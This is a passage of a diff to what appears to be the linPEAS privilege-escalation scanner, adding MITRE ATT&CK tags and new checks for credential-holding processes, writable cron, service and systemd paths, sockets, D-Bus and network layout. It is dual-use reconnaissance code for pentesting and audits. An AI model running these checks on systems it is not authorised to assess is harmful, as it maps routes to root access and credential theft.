"$SEARCH_IN_FOLDER" ]; then echo "" fi +fi + +if check_mitre_filter "T1003.007"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Processes with credentials in memory (root req)" + print_2title "Processes with credentials in memory (root req)" "T1003.007" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#credentials-from-process-memory" # Common credential-storing processes cred_processes="gdm-password gnome-keyring-daemon lightdm vsftpd apache2 sshd: mysql postgres redis-server mongod memcached elasticsearch jenkins tomcat nginx php-fpm supervisord vncserver xrdp teamviewer" @@ -3197,7 +4927,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then done # Check for processes with open handles to credential files echo "" - print_2title "Opened Files by processes" + print_2title "Opened Files by processes" "T1003.007" for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do # Skip if process doesn't exist or we can't access it [ ! -d "/proc/$pid" ] && continue @@ -3237,7 +4967,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then done | sed -${E} "s,\.(pem|key|cred|db|sqlite|conf|cnf|ini|env|secret|token|auth|passwd|shadow)$,\1${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," # Check for processes with memory-mapped files that might contain credentials echo "" - print_2title "Processes with memory-mapped credential files" + print_2title "Processes with memory-mapped credential files" "T1003.007" for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do # Skip if process doesn't exist or we can't access it [ ! -d "/proc/$pid" ] && continue @@ -3260,9 +4990,12 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo "" fi +fi + +if check_mitre_filter "T1574,T1554"; then if ! [ "$SEARCH_IN_FOLDER" ]; then if [ "$NOUSEPS" ]; then - print_2title "Binary processes permissions (non 'root root' and not belonging to current user)" + print_2title "Binary processes permissions (non 'root root' and not belonging to current user)" "T1574,T1554" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes" # Get list of writable binaries binW="" @@ -3297,8 +5030,11 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then fi fi +fi + +if check_mitre_filter "T1134.004"; then if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$NOUSEPS" ]; then - print_2title "Processes whose PPID belongs to a different user (not root)" + print_2title "Processes whose PPID belongs to a different user (not root)" "T1134.004" print_info "You will know if a user can somehow spawn processes as a different user" # Function to get user by PID using /proc get_user_by_pid() { @@ -3337,9 +5073,12 @@ if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$NOUSEPS" ]; then echo "" fi +fi + +if check_mitre_filter "T1083"; then if ! [ "$SEARCH_IN_FOLDER" ]; then if ! [ "$IAMROOT" ]; then - print_2title "Files opened by processes belonging to other users" + print_2title "Files opened by processes belonging to other users" "T1083" print_info "This is usually empty because of the lack of privileges to read other user processes information" # Function to get username by UID get_username_by_uid() { @@ -3380,9 +5119,12 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then fi fi +fi + +if check_mitre_filter "T1057"; then if ! [ "$SEARCH_IN_FOLDER" ]; then if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then - print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" + print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" "T1057" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#frequent-cron-jobs" temp_file=$(mktemp) if [ "$(ps -e -o user,command 2>/dev/null)" ]; then @@ -3396,21 +5138,33 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then fi fi +fi + +if check_mitre_filter "T1053.003"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Check for vulnerable cron jobs" + print_2title "Check for vulnerable cron jobs" "T1053.003" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs" - print_3title "Cron jobs list" + print_3title "Cron jobs list" "T1053.003" command -v crontab 2>/dev/null || echo_not_found "crontab" crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," command -v incrontab 2>/dev/null || echo_not_found "incrontab" incrontab -l 2>/dev/null ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," + grep -Hn '^PATH=' /etc/crontab /etc/cron.d/* 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + grep -RInE 'pg_basebackup|run-parts|crontab-ui' /etc/crontab /etc/cron.d /etc/anacrontab /var/spool/cron/crontabs /etc/incron.d /var/spool/incron 2>/dev/null | sed -${E} "s,$cronjobsB,${SED_RED},g" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" crontab -l -u "$USER" 2>/dev/null | tr -d "\r" ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths atq 2>/dev/null echo "" - print_3title "Checking for specific cron jobs vulnerabilities" + print_3title "Cron files with hidden carriage returns" "T1053.003" + grep -IRl $'\r' /etc/crontab /etc/cron.d /var/spool/cron/crontabs 2>/dev/null | while read -r file; do + [ -n "$file" ] || continue + echo "$file" | sed -${E} "s,.*,${SED_RED},g" + sed -n 'l' "$file" 2>/dev/null | head -n 20 + done + echo "" + print_3title "Checking for specific cron jobs vulnerabilities" "T1053.003" # Function to check if a binary is writable and executable check_binary_perms() { local bin="$1" @@ -3567,6 +5321,15 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo "Writable cron directory: $cron_dir" fi done + if command -v run-parts >/dev/null 2>&1; then + print_3title "run-parts executable entries" "T1053.003" + for cron_dir in /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly; do + [ -d "$cron_dir" ] || continue + echo "[$cron_dir]" + run-parts --test "$cron_dir" 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + done + echo "" + fi # Check for at jobs #if command -v atq >/dev/null 2>&1; then # echo "Checking at jobs..." @@ -3595,15 +5358,18 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then # done #fi else - print_2title "Cron jobs" + print_2title "Cron jobs" "T1053.003" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs" find "$SEARCH_IN_FOLDER" '(' -type d -or -type f ')' '(' -name "cron*" -or -name "anacron" -or -name "anacrontab" -or -name "incron.d" -or -name "incron" -or -name "at" -or -name "periodic" ')' -exec echo {} \; -exec ls -lR {} \; fi echo "" +fi + +if check_mitre_filter "T1543.001"; then if ! [ "$SEARCH_IN_FOLDER" ]; then if [ "$MACPEAS" ]; then - print_2title "Third party LaunchAgents & LaunchDemons" + print_2title "Third party LaunchAgents & LaunchDemons" "T1543.001" print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#launchd" print_info "Checking for privilege escalation vectors in LaunchAgents & LaunchDaemons:" print_info "1. Writable plist files" @@ -3676,7 +5442,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then done done echo "" - print_2title "StartupItems" + print_2title "StartupItems" "T1543.001" print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#startup-items" for startup_dir in /Library/StartupItems/ /System/Library/StartupItems/; do [ ! -d "$startup_dir" ] && continue @@ -3689,7 +5455,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then done done echo "" - print_2title "Login Items" + print_2title "Login Items" "T1543.001" print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#startup-items" osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null | tr ", " "\n" | while read -r login_item; do if [ -n "$login_item" ]; then @@ -3702,7 +5468,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then fi done echo "" - print_2title "SPStartupItemDataType" + print_2title "SPStartupItemDataType" "T1543.001" system_profiler SPStartupItemDataType 2>/dev/null | while read -r line; do if echo "$line" | grep -q "Location:"; then location=$(echo "$line" | cut -d: -f2- | xargs) @@ -3713,7 +5479,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then fi done echo "" - print_2title "Emond scripts" + print_2title "Emond scripts" "T1543.001" print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#emond" if [ -d "/private/var/db/emondClients" ]; then find "/private/var/db/emondClients" -type f 2>/dev/null | while read -r emond_script; do @@ -3724,7 +5490,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then done fi echo "" - print_2title "Periodic tasks" + print_2title "Periodic tasks" "T1543.001" print_info "Checking periodic tasks for privilege escalation vectors" for periodic_dir in /etc/periodic/daily /etc/periodic/weekly /etc/periodic/monthly; do [ ! -d "$periodic_dir" ] && continue @@ -3740,8 +5506,11 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then fi fi +fi + +if check_mitre_filter "T1053.003"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "System timers" + print_2title "System timers" "T1053.003" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers" # Function to check timer content for privilege escalation vectors check_timer_content() { @@ -3826,7 +5595,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then fi } # List all timers and check for privilege escalation vectors - print_3title "Active timers:" + print_3title "Active timers:" "T1053.003" systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | while read -r line; do # Extract timer unit name timer_unit=$(echo "$line" | awk '{print $1}') @@ -3843,7 +5612,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then fi done || echo_not_found # Check for disabled but available timers - print_3title "Disabled timers:" + print_3title "Disabled timers:" "T1053.003" systemctl list-unit-files --type=timer --state=disabled 2>/dev/null | grep -v "UNIT FILE" | while read -r line; do timer_unit=$(echo "$line" | awk '{print $1}') if [ -n "$timer_unit" ]; then @@ -3855,7 +5624,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then done || echo_not_found # Check timer files from PSTORAGE_TIMER if [ -n "$PSTORAGE_TIMER" ]; then - print_3title "Additional timer files:" + print_3title "Additional timer files:" "T1053.003" printf "%s\n" "$PSTORAGE_TIMER" | while read -r timer_file; do if [ -n "$timer_file" ] && [ -e "$timer_file" ]; then check_timer_file "$timer_file" @@ -3865,8 +5634,11 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo "" fi +fi + +if check_mitre_filter "T1543.002,T1007"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Services and Service Files" + print_2title "Services and Service Files" "T1543.002,T1007" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#services" # Function to check service content for privilege escalation vectors check_service_content() { @@ -3964,7 +5736,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then } # List all services and check for privilege escalation vectors echo "" - print_3title "Active services:" + print_3title "Active services:" "T1543.002,T1007" systemctl list-units --type=service --state=active 2>/dev/null | grep -v "UNIT" | while read -r line; do service_unit=$(echo "$line" | awk '{print $1}') if [ -n "$service_unit" ]; then @@ -3981,7 +5753,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then done || echo_not_found # Check for disabled but available services echo "" - print_3title "Disabled services:" + print_3title "Disabled services:" "T1543.002,T1007" systemctl list-unit-files --type=service --state=disabled 2>/dev/null | grep -v "UNIT FILE" | while read -r line; do service_unit=$(echo "$line" | awk '{print $1}') if [ -n "$service_unit" ]; then @@ -3999,7 +5771,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then # Check service files from PSTORAGE_SYSTEMD if [ -n "$PSTORAGE_SYSTEMD" ]; then echo "" - print_3title "Additional service files:" + print_3title "Additional service files:" "T1543.002,T1007" printf "%s\n" "$PSTORAGE_SYSTEMD" | while read -r service_file; do if [ -n "$service_file" ] && [ -e "$service_file" ]; then check_service_file "$service_file" @@ -4009,8 +5781,12 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then # Check for outdated services if EXTRA_CHECKS is enabled if [ "$EXTRA_CHECKS" ]; then echo "" - print_3title "Service versions and status:" - (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" + print_3title "Service versions and status:" "T1543.002,T1007" + if [ "$TIMEOUT" ]; then + $TIMEOUT 30 sh -c "(service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null" || echo_not_found "service|chkconfig|rc-status|launchctl" + else + (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" + fi fi # Check systemd path writability if [ ! "$WRITABLESYSTEMDPATH" ]; then @@ -4022,8 +5798,11 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo "" fi +fi + +if check_mitre_filter "T1543.002"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Systemd Information" + print_2title "Systemd Information" "T1543.002" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths" # Function to check if systemctl is available check_systemctl() { @@ -4033,6 +5812,10 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then fi return 0 } + # Function to list running systemd services + list_running_services() { + systemctl list-units --type=service --state=running 2>/dev/null + } # Function to get service file path get_service_file() { local service="$1" @@ -4071,7 +5854,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then # Check for systemd services running as root print_list "Services running as root? ..... "$NC if check_systemctl; then - systemctl list-units --type=service --state=running 2>/dev/null | + list_running_services | grep -E "root|0:0" | while read -r line; do service=$(echo "$line" | awk '{print $1}') @@ -4085,7 +5868,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then # Check for systemd services with dangerous capabilities print_list "Running services with dangerous capabilities? ... "$NC if check_systemctl; then - systemctl list-units --type=service --state=running 2>/dev/null | + list_running_services | grep -E "\.service" | while read -r line; do service=$(echo "$line" | awk '{print $1}') @@ -4101,26 +5884,43 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then # Check for systemd services with writable paths print_list "Services with writable paths? . "$NC if check_systemctl; then - systemctl list-units --type=service --state=running 2>/dev/null | + list_running_services | grep -E "\.service" | while read -r line; do service=$(echo "$line" | awk '{print $1}') service_file=$(get_service_file "$service") if [ -n "$service_file" ]; then + # Check service-specific PATH entries (Environment=PATH=...) + svc_writable_path=$(grep -E '^Environment=.*PATH=' "$service_file" 2>/dev/null | sed -E 's/^Environment=//; s/^"//; s/"$//; s/^PATH=//' | tr ':' '\n' | while read -r svc_path_entry; do + [ -z "$svc_path_entry" ] && continue + if [ -d "$svc_path_entry" ] && [ -w "$svc_path_entry" ]; then + echo "$svc_path_entry" + fi + done) + if [ "$svc_writable_path" ]; then + for svc_path_entry in $svc_writable_path; do + echo "$service: Writable service PATH entry '$svc_path_entry'" | sed -${E} "s,.*,${SED_RED_YELLOW},g" + done + fi # Check ExecStart paths grep -E "ExecStart|ExecStartPre|ExecStartPost" "$service_file" 2>/dev/null | while read -r exec_line; do - # Extract the first word after ExecStart* as the command - cmd=$(echo "$exec_line" | awk '{print $2}' | tr -d '"') - # Extract the rest as arguments - args=$(echo "$exec_line" | awk '{$1=$2=""; print $0}' | tr -d '"') + # Extract command from the right side of Exec*=, not from argv + exec_value="${exec_line#*=}" + exec_value=$(echo "$exec_value" | sed 's/^[[:space:]]*//') + cmd=$(echo "$exec_value" | awk '{print $1}' | tr -d '"') + # Strip systemd command prefixes (-, @, :, +, !) before path checks + cmd_path=$(echo "$cmd" | sed -E 's/^[-@:+!]+//') # Only check the command path, not arguments - if [ -n "$cmd" ] && [ -w "$cmd" ]; then - echo "$service: $cmd (from $exec_line)" | sed -${E} "s,.*,${SED_RED},g" + if [ -n "$cmd_path" ] && [ -w "$cmd_path" ]; then + echo "$service: $cmd_path (from $exec_line)" | sed -${E} "s,.*,${SED_RED},g" fi # Check for relative paths only in the command, not arguments - if [ -n "$cmd" ] && [ "${cmd#/}" = "$cmd" ] && ! echo "$cmd" | grep -qE '^-|^--'; then - echo "$service: Uses relative path '$cmd' (from $exec_line)" | sed -${E} "s,.*,${SED_RED},g" + if [ -n "$cmd_path" ] && [ "${cmd_path#/}" = "$cmd_path" ] && [ "${cmd_path#\$}" = "$cmd_path" ]; then + echo "$service: Uses relative path '$cmd_path' (from $exec_line)" | sed -${E} "s,.*,${SED_RED},g" + if [ "$svc_writable_path" ]; then + echo "$service: Relative Exec path + writable service PATH can allow path hijacking" | sed -${E} "s,.*,${SED_RED_YELLOW},g" + fi fi done fi @@ -4129,7 +5929,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo "" fi echo "" - print_2title "Systemd PATH" + print_2title "Systemd PATH" "T1543.002" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths" if check_systemctl; then systemctl show-environment 2>/dev/null | @@ -4145,8 +5945,11 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo "" fi +fi + +if check_mitre_filter "T1559"; then if ! [ "$IAMROOT" ]; then - print_2title "Analyzing .socket files" + print_2title "Analyzing .socket files" "T1559" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets" # Function to check if path is relative is_relative_path() { @@ -4263,9 +6066,12 @@ if ! [ "$IAMROOT" ]; then echo "" fi +fi + +if check_mitre_filter "T1571,T1049"; then if ! [ "$IAMROOT" ]; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Unix Sockets Analysis" + print_2title "Unix Sockets Analysis" "T1571,T1049" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets" # Function to get socket permissions get_socket_perms() { @@ -4367,6 +6173,9 @@ if ! [ "$IAMROOT" ]; then # Highlight dangerous ownership if echo "$owner_info" | grep -q "root"; then echo " └─(${RED}Owned by root${NC})" + if echo "$perms" | grep -q "Write"; then + echo " └─High risk: root-owned and writable Unix socket" | sed -${E} "s,.*,${SED_RED_YELLOW},g" + fi fi fi fi @@ -4375,8 +6184,11 @@ if ! [ "$IAMROOT" ]; then echo "" fi +fi + +if check_mitre_filter "T1559.001"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "D-Bus Analysis" + print_2title "D-Bus Analysis" "T1559.001" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus" # Function to check for dangerous methods check_dangerous_methods() { @@ -4537,22 +6349,39 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then # Analyze D-Bus Configuration Files if [ "$PSTORAGE_DBUS" ]; then echo "" - print_2title "D-Bus Configuration Files" + print_2title "D-Bus Configuration Files" "T1559.001" echo "$PSTORAGE_DBUS" | while read -r dir; do - for dbus_file in "$dir"/*; do - if [ -f "$dbus_file" ]; then - echo "Analyzing $dbus_file:" - if analyze_policy_file "$dbus_file"; then - echo " └─(${RED}Multiple weak policies found${NC})" - fi + [ -n "$dir" ] || continue + if [ -f "$dir" ]; then + echo "Analyzing $dir:" + if analyze_policy_file "$dir"; then + echo " └─(${RED}Multiple weak policies found${NC})" fi - done + continue + fi + [ -d "$dir" ] || continue + case "$dir" in + */system-services|*/services) + echo "Activation definitions in $dir:" + grep -RInE '^(Name|Exec|User)=' "$dir" 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed "s,Exec=,${SED_RED}Exec=${NC},g" | sed "s,User=,${SED_RED}User=${NC},g" + ;; + *) + for dbus_file in "$dir"/*; do + if [ -f "$dbus_file" ]; then + echo "Analyzing $dbus_file:" + if analyze_policy_file "$dbus_file"; then + echo " └─(${RED}Multiple weak policies found${NC})" + fi + fi + done + ;; + esac done fi # Check for D-Bus session bus if command -v dbus-send >/dev/null 2>&1; then echo "" - print_3title "D-Bus Session Bus Analysis" + print_3title "D-Bus Session Bus Analysis" "T1559.001" if dbus-send --session --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames 2>/dev/null | grep -q "Error"; then echo "(${RED}No access to session bus${NC})" else @@ -4573,10 +6402,13 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then fi echo "" +fi + +if check_mitre_filter "T1021.004"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Legacy r-commands (rsh/rlogin/rexec) and host-based trust" + print_2title "Legacy r-commands (rsh/rlogin/rexec) and host-based trust" "T1021.004" echo "" - print_3title "Listening r-services (TCP 512-514)" + print_3title "Listening r-services (TCP 512-514)" "T1021.004" if command -v ss >/dev/null 2>&1; then ss -ltnp 2>/dev/null | awk '$1 ~ /^LISTEN$/ && $4 ~ /:(512|513|514)$/ {print}' || echo_not_found "ss" elif command -v netstat >/dev/null 2>&1; then @@ -4585,7 +6417,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo_not_found "ss|netstat" fi echo "" - print_3title "systemd units exposing r-services" + print_3title "systemd units exposing r-services" "T1021.004" if command -v systemctl >/dev/null 2>&1; then systemctl list-unit-files 2>/dev/null | grep -E '^(rlogin|rsh|rexec)\.(socket|service)\b' || echo_not_found "rlogin|rsh|rexec units" systemctl list-sockets 2>/dev/null | grep -E '\b(rlogin|rsh|rexec)\.socket\b' || true @@ -4593,7 +6425,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo_not_found "systemctl" fi echo "" - print_3title "inetd/xinetd configuration for r-services" + print_3title "inetd/xinetd configuration for r-services" "T1021.004" if [ -f /etc/inetd.conf ]; then grep -vE '^\s*#|^\s*$' /etc/inetd.conf 2>/dev/null | grep -Ei '\b(shell|login|exec|rsh|rlogin|rexec)\b' 2>/dev/null || echo " No r-services found in /etc/inetd.conf" else @@ -4616,7 +6448,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo_not_found "/etc/xinetd.d" fi echo "" - print_3title "Installed r-service server packages" + print_3title "Installed r-service server packages" "T1021.004" if command -v dpkg >/dev/null 2>&1; then dpkg -l 2>/dev/null | grep -E '\b(rsh-server|rsh-redone-server|krb5-rsh-server|inetutils-inetd|openbsd-inetd|xinetd|netkit-rsh)\b' || echo " No related packages found via dpkg" elif command -v rpm >/dev/null 2>&1; then @@ -4625,7 +6457,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo_not_found "dpkg|rpm" fi echo "" - print_3title "/etc/hosts.equiv and /etc/shosts.equiv" + print_3title "/etc/hosts.equiv and /etc/shosts.equiv" "T1021.004" for f in /etc/hosts.equiv /etc/shosts.equiv; do if [ -f "$f" ]; then perms=$(stat -c %a "$f" 2>/dev/null) @@ -4641,7 +6473,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then fi done echo "" - print_3title "Per-user .rhosts files" + print_3title "Per-user .rhosts files" "T1021.004" any_rhosts=false for rfile in /root/.rhosts /home/*/.rhosts; do if [ -f "$rfile" ]; then @@ -4660,7 +6492,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then done if ! $any_rhosts; then echo_not_found ".rhosts"; fi echo "" - print_3title "PAM rhosts authentication" + print_3title "PAM rhosts authentication" "T1021.004" shown=false for p in /etc/pam.d/rlogin /etc/pam.d/rsh; do if [ -f "$p" ]; then @@ -4671,7 +6503,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then done if ! $shown; then echo_not_found "/etc/pam.d/rlogin|rsh"; fi echo "" - print_3title "SSH HostbasedAuthentication" + print_3title "SSH HostbasedAuthentication" "T1021.004" if [ -f /etc/ssh/sshd_config ]; then if grep -qiE '^[^#]*HostbasedAuthentication\s+yes' /etc/ssh/sshd_config 2>/dev/null; then echo " HostbasedAuthentication yes (check /etc/shosts.equiv or ~/.shosts)" @@ -4682,13 +6514,16 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo_not_found "/etc/ssh/sshd_config" fi echo "" - print_3title "Potential DNS control indicators (local)" + print_3title "Potential DNS control indicators (local)" "T1021.004" (ps -eo comm,args 2>/dev/null | grep -Ei '(^|/)(pdns|pdns_server|pdns_recursor|powerdns-admin)( |$)' | grep -Ev 'grep|bash' || echo " Not detected") echo "" fi +fi + +if check_mitre_filter "T1053.003"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Crontab UI (root) misconfiguration checks" + print_2title "Crontab UI (root) misconfiguration checks" "T1053.003" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs" # Collect candidate services referencing crontab-ui candidates="" @@ -4782,6 +6617,32 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then fi fi +fi + +if check_mitre_filter "T1083"; then +if [ "$(command -v lsof 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then + print_2title "Deleted files still open" "T1083" + print_info "Open deleted files can hide tools and still consume disk space" + lsof +L1 2>/dev/null | sed -${E} "s,\\(deleted\\),${SED_RED},g" + echo "" + print_2title "Deleted executables still running" "T1083" + print_info "A deleted /proc//exe may indicate tampering, cleanup, or a useful runtime-only binary" + ls -l /proc/[0-9]*/exe 2>/dev/null | grep "(deleted)" | sed -${E} "s,\\(deleted\\),${SED_RED},g" | head -n 200 + echo "" +elif [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then + print_2title "Deleted files still open" "T1083" + print_info "lsof not found, scanning /proc for deleted file descriptors" + ls -l /proc/[0-9]*/fd 2>/dev/null | grep "(deleted)" | sed -${E} "s,\\(deleted\\),${SED_RED},g" | head -n 200 + echo "" + print_2title "Deleted executables still running" "T1083" + print_info "Scanning /proc//exe for deleted runtime binaries" + ls -l /proc/[0-9]*/exe 2>/dev/null | grep "(deleted)" | sed -${E} "s,\\(deleted\\),${SED_RED},g" | head -n 200 + echo "" +fi + +fi + +fi fi echo '' @@ -4789,7 +6650,9 @@ echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi if echo $CHECKS | grep -q network_information; then +if check_mitre_filter "T1016,T1590,T1018,T1040,T1049"; then print_title "Network Information" +if check_mitre_filter "T1016"; then # Function to parse network interfaces from /proc/net/dev and other sources parse_network_interfaces() { # Try to get interfaces from /proc/net/dev @@ -4837,7 +6700,7 @@ parse_network_interfaces() { done fi } -print_2title "Interfaces" +print_2title "Interfaces" "T1016" cat /etc/networks 2>/dev/null # Try standard tools first, then fall back to our custom function if command -v ifconfig >/dev/null 2>&1; then @@ -4847,11 +6710,28 @@ elif command -v ip >/dev/null 2>&1; then else parse_network_interfaces fi +if command -v ip >/dev/null 2>&1; then + print_3title "Routing & policy quick view" "T1016" + ip route 2>/dev/null + ip -6 route 2>/dev/null | head -n 30 + echo "" + ip rule 2>/dev/null + print_3title "Virtual/overlay interfaces quick view" "T1016" + ip -d link 2>/dev/null | grep -E "^[0-9]+:|veth|docker|cni|flannel|br-|bridge|vlan|bond|tun|tap|wg|tailscale" | sed -${E} "s,veth|docker|cni|flannel|br-|bridge|vlan|bond|tun|tap|wg|tailscale,${SED_RED_YELLOW},g" + print_3title "Network namespaces quick view" "T1016" + ip netns list 2>/dev/null + ls -la /var/run/netns/ 2>/dev/null +fi +print_3title "Forwarding status" "T1016" +sysctl net.ipv4.ip_forward net.ipv6.conf.all.forwarding 2>/dev/null | sed -${E} "s,=[[:space:]]*1,${SED_RED_YELLOW},g" echo "" +fi + +if check_mitre_filter "T1016,T1018"; then # Function to get hostname using multiple methods get_hostname_info() { - print_3title "Hostname Information" + print_3title "Hostname Information" "T1016,T1018" # Try multiple methods to get hostname if command -v hostname >/dev/null 2>&1; then echo "System hostname: $(hostname 2>/dev/null)" @@ -4869,7 +6749,7 @@ get_hostname_info() { } # Function to get hosts file information get_hosts_info() { - print_3title "Hosts File Information" + print_3title "Hosts File Information" "T1016,T1018" if [ -f "/etc/hosts" ]; then echo "Contents of /etc/hosts:" grep -v "^#" /etc/hosts 2>/dev/null | grep -v "^$" | while read -r line; do @@ -4880,7 +6760,7 @@ get_hosts_info() { } # Function to get DNS information get_dns_info() { - print_3title "DNS Configuration" + print_3title "DNS Configuration" "T1016,T1018" # Get resolv.conf information if [ -f "/etc/resolv.conf" ]; then echo "DNS Servers (resolv.conf):" @@ -4928,15 +6808,18 @@ get_dns_info() { fi echo "" } -print_2title "Hostname, hosts and DNS" +print_2title "Hostname, hosts and DNS" "T1016,T1018" # Execute all information gathering functions get_hostname_info get_hosts_info get_dns_info +fi + +if check_mitre_filter "T1018,T1040"; then # Function to parse routing information from /proc/net/route parse_proc_route() { - print_3title "Routing Table (from /proc/net/route)" + print_3title "Routing Table (from /proc/net/route)" "T1018,T1040" echo "Destination Gateway Genmask Flags Metric Ref Use Iface" echo "--------------------------------------------------------------------------------" # Skip header line and process each route @@ 